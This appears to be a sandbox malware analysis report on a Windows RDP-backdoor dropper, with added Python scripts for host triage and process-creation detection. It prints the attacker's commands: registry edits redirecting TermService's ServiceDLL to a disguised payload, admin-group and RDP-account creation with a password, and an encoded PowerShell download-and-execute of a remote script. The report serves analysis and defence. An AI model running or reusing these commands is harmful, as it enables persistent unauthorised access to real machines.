Analysis
- max time kernel: 48s
- max time network: 117s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 09-11-2020 20:56
Static task: static1
Behavioral task: behavioral1
- Sample: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
- Resource: win10v20201028
General
- Target: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
- Size: 3.4MB
- MD5: 442016bf1c6123cc40ff23c3637396c0
- SHA1: cea8d515186cf94bdaa4f78bbf6f5b9db9125c9a
- SHA256: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a
- SHA512: d95bc9ee83436c7967dbe59e6c5625737053adb074b45972a7855f03d3770d87edde332a8cf4aa02529330178be99005a7b0912e6929d284c685433694199727
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blacklisted process makes network request (9 IoCs)
Processes (flow, pid, process):
- flow 21: pid 420 powershell.exe
- flow 23: pid 420 powershell.exe
- flow 24: pid 420 powershell.exe
- flow 25: pid 420 powershell.exe
- flow 27: pid 420 powershell.exe
- flow 29: pid 420 powershell.exe
- flow 31: pid 420 powershell.exe
- flow 33: pid 420 powershell.exe
- flow 35: pid 420 powershell.exe
Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

YARA matches (resource, yara_rule):
- \Windows\Branding\mediasrv.png: upx
- \Windows\Branding\mediasvc.png: upx
Deletes itself (1 IoCs)
Processes (pid, process):
- 1020 powershell.exe

Loads dropped DLL (2 IoCs)
Processes (pid, process):
- pid 1160, two entries (the process-name column is empty in the source table)
Modifies service (2 TTPs, 2 IoCs)
Processes (description, ioc, process):
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" (reg.exe)
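The ServiceDLL rewrite above is the persistence mechanism in this report: when TermService starts, svchost.exe loads whatever file the Parameters\ServiceDLL value names, and here that is a UPX-packed PE carrying a .png extension (see the YARA match above and the mediasrv.png hashes under Downloads). The host-triage script below is an added example, not part of the sandbox output. It checks the settings this report shows being changed (TermService ServiceDLL, the RDP-Tcp PortNumber, the fEnableWddmDriver policy, and membership of Administrators and Remote Desktop Users) against stock Windows defaults; the expected ServiceDLL value %SystemRoot%\System32\termsrv.dll and port 3389 are those defaults, while the baseline admin set, the function names and the sample `net localgroup` output are assumptions constructed for the example.

```python
"""Host triage for the persistence recorded in this report (added example, not sandbox output).

assess() is pure Python and runs anywhere; collect_windows_state() reads the live
registry and `net localgroup` output and therefore only works on Windows.
"""
import subprocess
import sys
from dataclasses import dataclass, field
from typing import FrozenSet, List, Optional

# Stock Windows 10 values of the two registry settings the sample rewrote.
EXPECTED_TERMSERVICE_DLL = r"%SystemRoot%\System32\termsrv.dll"
DEFAULT_RDP_PORT = 3389
# Built-in service identities; S-1-5-20 is NETWORK SERVICE, the one the sample promoted.
SERVICE_ACCOUNTS = {"nt authority\\network service", "nt authority\\local service"}


@dataclass
class HostState:
    termservice_dll: Optional[str] = None      # HKLM\...\Services\TermService\Parameters\ServiceDLL
    rdp_port: Optional[int] = None             # HKLM\...\Terminal Server\WinStations\RDP-Tcp\PortNumber
    wddm_driver_policy: Optional[int] = None   # HKLM\SOFTWARE\Policies\...\Terminal Services\fEnableWddmDriver
    administrators: List[str] = field(default_factory=list)
    rdp_users: List[str] = field(default_factory=list)


def parse_net_localgroup(output: str) -> List[str]:
    """Members printed by `net localgroup <group>`: the lines between the dashed rule and the trailer."""
    members, in_list = [], False
    for line in output.splitlines():
        if line.startswith("----"):
            in_list = True
        elif line.startswith("The command completed"):
            break
        elif in_list and line.strip():
            members.append(line.strip())
    return members


def assess(state: HostState,
           expected_admins: FrozenSet[str] = frozenset({"administrator"}),
           expected_rdp_users: FrozenSet[str] = frozenset()) -> List[str]:
    """One finding per deviation from the stock configuration; empty list means clean."""
    findings: List[str] = []
    dll = state.termservice_dll or ""
    if dll and dll.lower() != EXPECTED_TERMSERVICE_DLL.lower():
        findings.append(f"TermService ServiceDLL redirected to {dll}")
    if dll and not dll.lower().endswith(".dll"):
        findings.append("TermService ServiceDLL has a non-DLL extension (masqueraded payload)")
    if state.rdp_port is not None and state.rdp_port != DEFAULT_RDP_PORT:
        findings.append(f"RDP listener moved to port {state.rdp_port}")
    if state.wddm_driver_policy == 0:
        findings.append("fEnableWddmDriver policy forced to 0")
    admin_baseline = {a.lower() for a in expected_admins}
    for member in state.administrators:
        if member.lower() in SERVICE_ACCOUNTS:
            findings.append(f"service account {member} is a member of Administrators")
        elif member.lower() not in admin_baseline:
            findings.append(f"unexpected local administrator: {member}")
    rdp_baseline = {u.lower() for u in expected_rdp_users}
    for member in state.rdp_users:
        if member.lower() not in rdp_baseline:
            findings.append(f"unexpected member of Remote Desktop Users: {member}")
    return findings


def collect_windows_state() -> HostState:
    """Live collection; needs the Windows registry and net.exe."""
    if sys.platform != "win32":
        raise RuntimeError("live collection only runs on Windows")
    import winreg  # noqa: E402  (Windows-only module)

    def read(subkey: str, name: str):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                return winreg.QueryValueEx(key, name)[0]  # REG_EXPAND_SZ is returned unexpanded
        except OSError:
            return None

    def members(group: str) -> List[str]:
        out = subprocess.run(["net", "localgroup", group], capture_output=True, text=True).stdout
        return parse_net_localgroup(out)

    return HostState(
        termservice_dll=read(r"SYSTEM\CurrentControlSet\Services\TermService\Parameters", "ServiceDLL"),
        rdp_port=read(r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", "PortNumber"),
        wddm_driver_policy=read(r"SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services", "fEnableWddmDriver"),
        administrators=members("Administrators"),
        rdp_users=members("Remote Desktop Users"),
    )


# Constructed `net localgroup Administrators` output, as it would read after this sample ran.
SAMPLE_NET_OUTPUT = """Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Admin
NT AUTHORITY\\NETWORK SERVICE
updwin
The command completed successfully.
"""


def triage_from_report() -> List[str]:
    """The end state this report's process tree produces, assessed offline."""
    state = HostState(
        termservice_dll=r"C:\Windows\branding\mediasrv.png",
        rdp_port=0x1C21,   # the value reg.exe wrote; 7201 decimal
        wddm_driver_policy=0,
        administrators=parse_net_localgroup(SAMPLE_NET_OUTPUT),
        rdp_users=["updwin"],
    )
    return assess(state, expected_admins=frozenset({"administrator", "admin"}))


if __name__ == "__main__":
    findings = assess(collect_windows_state()) if sys.platform == "win32" else triage_from_report()
    print("\n".join(findings) or "no findings")
```

Run it on a suspect host and any non-empty output is worth a look; on the state this report produces it returns seven findings. Compare the ServiceDLL value unexpanded, as QueryValueEx returns it, so a path that merely expands to termsrv.dll does not mask a redirect.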
Drops file in Program Files directory (4 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
Drops file in Windows directory (19 IoCs)
Processes (description, ioc, process); two powershell.exe processes are involved, every entry is powershell.exe:
- File opened for modification: C:\Windows\branding\mediasrv.png
- File opened for modification: C:\Windows\branding\wupsvc.jpg
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_x3yyqkwl.ntw.ps1
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBAD.tmp
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBFD.tmp
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- File created: C:\Windows\branding\mediasrv.png
- File created: C:\Windows\branding\mediasvc.png
- File opened for modification: C:\Windows\branding\ShellBrd
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFBBE.tmp
- File opened for modification: C:\Windows\branding\Basebrd
- File opened for modification: C:\Windows\branding\mediasvc.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_luiem2ot.wui.psm1
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB0F.tmp
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB9D.tmp
- File created: C:\Windows\branding\wupsvc.jpg
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Modifies data under HKEY_USERS (217 IoCs; the entries shown below are the subset the report displays)
Processes (description, ioc, process): every entry was written by powershell.exe. All keys are under \REGISTRY\USER\S-1-5-20\Software\; IS below stands for Microsoft\Windows\CurrentVersion\Internet Settings. S-1-5-20 is the well-known SID of NT AUTHORITY\NETWORK SERVICE, the account the sample adds to Administrators in the process tree, and the profile whose Temp directory receives the dropped files listed above.
- Set value (int) IS\ZoneMap\AutoDetect = "1"
- Set value (str) IS\Zones\3\DisplayName = "Internet"
- Set value (int) IS\Lockdown_Zones\2\Flags = "33"
- Set value (str) IS\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"
- Set value (int) IS\Zones\3\1400 = "0"
- Key created IS\ZoneMap\ProtocolDefaults
- Key created Microsoft\SystemCertificates\trust
- Set value (int) IS\Zones\0\Flags = "33"
- Set value (str) IS\Lockdown_Zones\1\DisplayName = "Local intranet"
- Set value (int) IS\Zones\1\1200 = "0"
- Set value (int) IS\Lockdown_Zones\1\1200 = "3"
- Set value (int) IS\Lockdown_Zones\2\1200 = "3"
- Set value (str) IS\ZoneMap\ (unnamed default value)
- Key created Microsoft\SystemCertificates\Disallowed\CRLs
- Key created Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map
- Set value (int) IS\Zones\0\CurrentLevel = "0"
- Key created IS\Lockdown_Zones\1
- Set value (int) IS\Lockdown_Zones\3\Flags = "33"
- Set value (int) IS\ZoneMap\ProtocolDefaults\file = "3"
- Key created Microsoft\SystemCertificates\trust\Certificates
- Set value (str) IS\Zones\2\LowIcon = "inetcpl.cpl#005424"
- Set value (int) IS\Zones\3\Flags = "1"
- Set value (str) IS\Lockdown_Zones\3\DisplayName = "Internet"
- Set value (str) IS\Lockdown_Zones\3\ (unnamed default value)
- Set value (int) IS\Lockdown_Zones\4\Flags = "33"
- Set value (str) IS\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
- Set value (str) IS\Lockdown_Zones\1\Icon = "shell32.dll#0018"
- Key created Microsoft\SystemCertificates\CA
- Set value (int) IS\Zones\2\CurrentLevel = "69632"
- Key created IS\ZoneMap\
- Set value (str) IS\Zones\2\DisplayName = "Trusted sites"
- Set value (int) IS\Zones\1\2500 = "3"
- Set value (str) IS\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
- Set value (str) IS\Lockdown_Zones\0\Icon = "shell32.dll#0016"
- Key created Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Set value (int) IS\Zones\2\Flags = "71"
- Key created IS\Lockdown_Zones\0
- Key created IS\Lockdown_Zones
- Set value (str) IS\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
- Set value (str) IS\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
- Set value (data) Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 (UTF-16LE for ",Software\Microsoft\Windows\CurrentVersion\Internet Settings,")
- Set value (int) IS\Lockdown_Zones\3\1400 = "1"
- Set value (str) IS\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
- Key created Microsoft\SystemCertificates\SmartCardRoot
- Set value (str) Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
- Set value (str) IS\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"
- Set value (int) IS\ZoneMap\ProxyBypass = "1"
- Key created Policies\Microsoft\SystemCertificates\CA\CTLs
- Set value (int) IS\ZoneMap\ProxyByPass = "0"
- Set value (data) IS\ZonesSecurityUpgrade = 7fd9c04391add601
- Key created Microsoft\SystemCertificates\CA\CTLs
- Set value (int) IS\Lockdown_Zones\0\1200 = "3"
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople
- Key created Microsoft
- Key created IS\Lockdown_Zones\3
- Set value (int) IS\EnableNegotiate = "1"
- Key created Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created Policies\Microsoft\SystemCertificates\trust
- Set value (int) IS\ZoneMap\UNCAsIntranet = "1"
- Set value (str) IS\Zones\2\Icon = "inetcpl.cpl#00004480"
- Set value (int) IS\ZoneMap\ProtocolDefaults\https = "3"
- Set value (int) IS\Zones\SelfHealCount = "1"
- Set value (str) IS\ZoneMap\Ranges\ (unnamed default value)
- Set value (str) IS\Zones\0\DisplayName = "My Computer"
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
- HTTP User-Agent header, flow 23: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 25: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes (pid, process):
- 1020 powershell.exe (6 entries)
- 420 powershell.exe (3 entries)

Suspicious behavior: LoadsDriver (2 IoCs)
Processes (pid, process):
- pid 616, two entries (the process-name column is empty in the source table)
Suspicious use of AdjustPrivilegeToken (77 IoCs; 64 shown)
Processes (description, pid, process): every entry is pid 1020 powershell.exe.
- Token: SeDebugPrivilege
- then, three times in succession, the same run of tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of WriteProcessMemory (68 IoCs; 64 shown)
Processes (description, pid, process, target process); the source table records each pair twice:
- PID 580 (22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe) wrote to memory of 1020 (powershell.exe)
- PID 1020 (powershell.exe) wrote to memory of 3584 (csc.exe)
- PID 3584 (csc.exe) wrote to memory of 2400 (cvtres.exe)
- PID 1020 (powershell.exe) wrote to memory of 212 (reg.exe)
- PID 1020 (powershell.exe) wrote to memory of 196 (reg.exe)
- PID 1020 (powershell.exe) wrote to memory of 732 (reg.exe)
- PID 1020 (powershell.exe) wrote to memory of 3008 (net.exe)
- PID 3008 (net.exe) wrote to memory of 4012 (net1.exe)
- PID 1020 (powershell.exe) wrote to memory of 2400 (cmd.exe)
- PID 2400 (cmd.exe) wrote to memory of 3680 (cmd.exe)
- PID 3680 (cmd.exe) wrote to memory of 2944 (net.exe)
- PID 2944 (net.exe) wrote to memory of 1724 (net1.exe)
- PID 1020 (powershell.exe) wrote to memory of 2308 (cmd.exe)
- PID 2308 (cmd.exe) wrote to memory of 1000 (cmd.exe)
- PID 1000 (cmd.exe) wrote to memory of 1056 (net.exe)
- PID 1056 (net.exe) wrote to memory of 2060 (net1.exe)
- PID 3080 (cmd.exe) wrote to memory of 1600 (net.exe)
- PID 1600 (net.exe) wrote to memory of 1500 (net1.exe)
- PID 1060 (cmd.exe) wrote to memory of 508 (net.exe)
- PID 508 (net.exe) wrote to memory of 3500 (net1.exe)
- PID 3708 (cmd.exe) wrote to memory of 3792 (net.exe)
- PID 3792 (net.exe) wrote to memory of 912 (net1.exe)
- PID 1724 (cmd.exe) wrote to memory of 2400 (net.exe)
- PID 2400 (net.exe) wrote to memory of 1336 (net1.exe)
- PID 3932 (cmd.exe) wrote to memory of 1704 (net.exe)
- PID 1704 (net.exe) wrote to memory of 2212 (net1.exe)
- PID 772 (cmd.exe) wrote to memory of 3048 (net.exe)
- PID 3048 (net.exe) wrote to memory of 188 (net1.exe)
- PID 500 (cmd.exe) wrote to memory of 3024 (WMIC.exe)
- PID 804 (cmd.exe) wrote to memory of 2944 (WMIC.exe)
- PID 1020 (powershell.exe) wrote to memory of 1492 (cmd.exe)
- PID 496 (cmd.exe) wrote to memory of 3008 (cmd.exe)
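The signatures above are what a sandbox emits after the fact; on a managed endpoint the same behaviours show up as process-creation events (Sysmon Event ID 1, or Security 4688 with command-line auditing). The rules below are an added example, not part of this report, written against the command lines in its process tree. The event records are constructed to mirror those command lines and use Sysmon's Image, ParentImage and CommandLine field names; two benign look-alikes (a read-only `reg query` and a plain `net localgroup` listing) are included to show what must not fire. Rule and chain names are this example's own.

```python
"""Process-creation detection for the behaviours in this report (added example, not sandbox output)."""
import re
from typing import Dict, List, Tuple

# (rule name, image pattern, command-line pattern); everything is matched case-insensitively.
RULES: List[Tuple[str, str, str]] = [
    ("rdp_port_change", r"\\reg\.exe$",
     r"winstations\\rdp-tcp.*\s/v\s+portnumber\b"),
    ("termservice_servicedll_redirect", r"\\reg\.exe$",
     r"services\\termservice\\parameters.*\s/v\s+servicedll\b"),
    ("rdp_wddm_driver_disabled", r"\\reg\.exe$",
     r"terminal services.*\s/v\s+fenablewddmdriver\b.*\s/d\s+0\b"),
    ("local_admin_group_add", r"\\net1?\.exe$",
     r'localgroup\s+"?administrators"?\s.*/add\b'),
    ("service_account_added_to_admins", r"\\net1?\.exe$",
     r'localgroup\s+"?administrators"?\s+"nt authority\\(?:network|local) service"\s+/add\b'),
    ("rdp_users_group_add", r"\\net1?\.exe$",
     r'localgroup\s+"remote desktop users"\s.*/add\b'),
    ("local_account_created", r"\\net1?\.exe$",
     r"\buser\s+\S+\s+\S+\s+/add\b"),
    ("powershell_execution_policy_bypass", r"\\powershell\.exe$",
     r"(?:-ep|-executionpolicy)\s+bypass\b"),
    ("powershell_encoded_command", r"\\powershell\.exe$",
     r"\s-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{40,}"),
    ("wmic_hardware_enumeration", r"\\wmic\.exe$",
     r"(?:win32_videocontroller|\bcpu\s+get\b)"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]

# Rule combinations that, seen together on one host, describe this sample's end state.
CHAINS = {
    "rdp_backdoor_chain": {"termservice_servicedll_redirect", "rdp_port_change"},
    "rdp_access_account_chain": {"local_account_created", "rdp_users_group_add"},
}


def match_rules(event: Dict[str, str]) -> List[str]:
    """Names of every rule whose image and command-line patterns both match the event."""
    image, cmd = event.get("Image", ""), event.get("CommandLine", "")
    return [name for name, img_re, cmd_re in COMPILED if img_re.search(image) and cmd_re.search(cmd)]


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Event index -> rule names, only for events that fired."""
    hits: Dict[int, List[str]] = {}
    for idx, event in enumerate(events):
        names = match_rules(event)
        if names:
            hits[idx] = names
    return hits


def correlate(hits: Dict[int, List[str]]) -> List[str]:
    """Chains whose every rule fired somewhere in the scanned events."""
    seen = {name for names in hits.values() for name in names}
    return [chain for chain, required in CHAINS.items() if required <= seen]


# Constructed process-creation records mirroring this report's tree (Sysmon EID 1 field names).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\system32\reg.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'},
    {"Image": r"C:\Windows\system32\reg.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'},
    {"Image": r"C:\Windows\system32\reg.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'},
    {"Image": r"C:\Windows\system32\net.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'},
    {"Image": r"C:\Windows\system32\net.exe", "ParentImage": CMD,
     "CommandLine": r"net.exe user updwin aG4xSuFP /add"},
    {"Image": r"C:\Windows\system32\net.exe", "ParentImage": CMD,
     "CommandLine": r'net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD'},
    {"Image": PS, "ParentImage": CMD,
     "CommandLine": r"powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"},
    {"Image": r"C:\Windows\System32\Wbem\WMIC.exe", "ParentImage": CMD,
     "CommandLine": r"wmic path win32_VideoController get name"},
    # Benign look-alikes: a read-only registry query and a group listing without /add.
    {"Image": r"C:\Windows\system32\reg.exe", "ParentImage": CMD,
     "CommandLine": r'"C:\Windows\system32\reg.exe" query HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters'},
    {"Image": r"C:\Windows\system32\net.exe", "ParentImage": CMD,
     "CommandLine": r'"C:\Windows\system32\net.exe" localgroup Administrators'},
]

if __name__ == "__main__":
    hits = scan(EVENTS)
    for idx, names in hits.items():
        print(f"event {idx}: {', '.join(names)}")
    print("chains:", ", ".join(correlate(hits)))
```

Keep the individual rules noisy-but-cheap and let correlate() carry the confidence: a lone `reg add ... PortNumber` is an administrator moving RDP, while the same host also redirecting TermService's ServiceDLL and minting an RDP-enabled local account is this report.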
Processes (tree; the number in brackets is the depth the sandbox recorded, so a later [1] is a process whose parent the tree does not link)

[1] C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"
    - Suspicious use of WriteProcessMemory
    [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
        - Deletes itself
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.cmdline"
            - Suspicious use of WriteProcessMemory
            note: csc.exe followed by cvtres.exe under powershell.exe is the pattern produced by Add-Type compiling C# source in the script; the resulting exvorycj.dll, .cs and .cmdline files are listed under Downloads.
            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72E4.tmp" "c:\Users\Admin\AppData\Local\Temp\exvorycj\CSCA0829ACF0674A82AF57138E0B8E8.TMP"
        [3] C:\Windows\system32\reg.exe
            cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            note: 0x1C21 is 7201 decimal; the RDP listener is moved off its default port 3389.
        [3] C:\Windows\system32\reg.exe
            cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            - Modifies service
            - Modifies registry key
            note: svchost.exe loads the file named by Parameters\ServiceDLL when TermService starts. The stock value is %SystemRoot%\System32\termsrv.dll; the replacement is a UPX-packed file with a .png extension (YARA match under Signatures, hashes under Downloads).
        [3] C:\Windows\system32\reg.exe
            cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        [3] C:\Windows\system32\net.exe
            cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
            - Suspicious use of WriteProcessMemory
            note: TermService runs as NETWORK SERVICE (S-1-5-20), so whatever the replaced ServiceDLL does now runs with local administrator group membership; S-1-5-20 is also the hive written under "Modifies data under HKEY_USERS".
            [4] C:\Windows\system32\net1.exe
                cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        [3] C:\Windows\system32\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\cmd.exe
                cmd: cmd /c net start rdpdr
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\system32\net.exe
                    cmd: net start rdpdr
                    - Suspicious use of WriteProcessMemory
                    [6] C:\Windows\system32\net1.exe
                        cmd: C:\Windows\system32\net1 start rdpdr
        [3] C:\Windows\system32\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
            - Suspicious use of WriteProcessMemory
            note: starting the service loads the ServiceDLL set above.
            [4] C:\Windows\system32\cmd.exe
                cmd: cmd /c net start TermService
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\system32\net.exe
                    cmd: net start TermService
                    - Suspicious use of WriteProcessMemory
                    [6] C:\Windows\system32\net1.exe
                        cmd: C:\Windows\system32\net1 start TermService
        [3] C:\Windows\system32\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        [3] C:\Windows\system32\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user updwin Ghasar4f5 /del
    - Suspicious use of WriteProcessMemory
    note: removes any existing updwin account before it is recreated below.
    [2] C:\Windows\system32\net.exe
        cmd: net.exe user updwin Ghasar4f5 /del
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 user updwin Ghasar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user updwin aG4xSuFP /add
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\net.exe
        cmd: net.exe user updwin aG4xSuFP /add
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 user updwin aG4xSuFP /add

[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\net.exe
        cmd: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD

[1] C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\net.exe
        cmd: net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe
